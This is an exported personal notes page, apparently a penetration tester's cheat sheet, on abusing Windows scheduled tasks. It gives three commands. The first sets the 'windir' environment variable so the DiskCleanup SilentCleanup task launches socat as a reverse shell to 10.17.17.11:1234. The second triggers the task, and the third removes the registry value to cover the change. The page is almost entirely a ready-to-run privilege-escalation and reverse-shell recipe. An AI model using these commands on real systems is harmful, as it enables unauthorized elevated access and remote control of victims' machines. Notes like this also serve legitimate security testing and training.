<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>Scheduled Tasks</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Scheduled Tasks</h1>

      <div class="ck-content">
        <p>edit environment variables used by programs in scheduled tasks to get
          a reverse shell(using disk-cleanup)</p><pre><code class="language-text-plain">reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:10.17.17.11:1234 EXEC:cmd.exe,pipes &amp;REM " /f</code></pre><pre><code class="language-text-plain">schtasks /run  /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I</code></pre><pre><code class="language-text-plain">reg delete "HKCU\Environment" /v "windir" /f</code></pre>

        <figure
        class="image image_resized" style="width:61.04%">
          <img src="Scheduled%20Tasks/24b5ce8c9a6cb1194ed66054bc2ed0.png" />
          </figure>
          <p> </p>
          <p> </p>
      </div>
    </div>
  </body>

</html>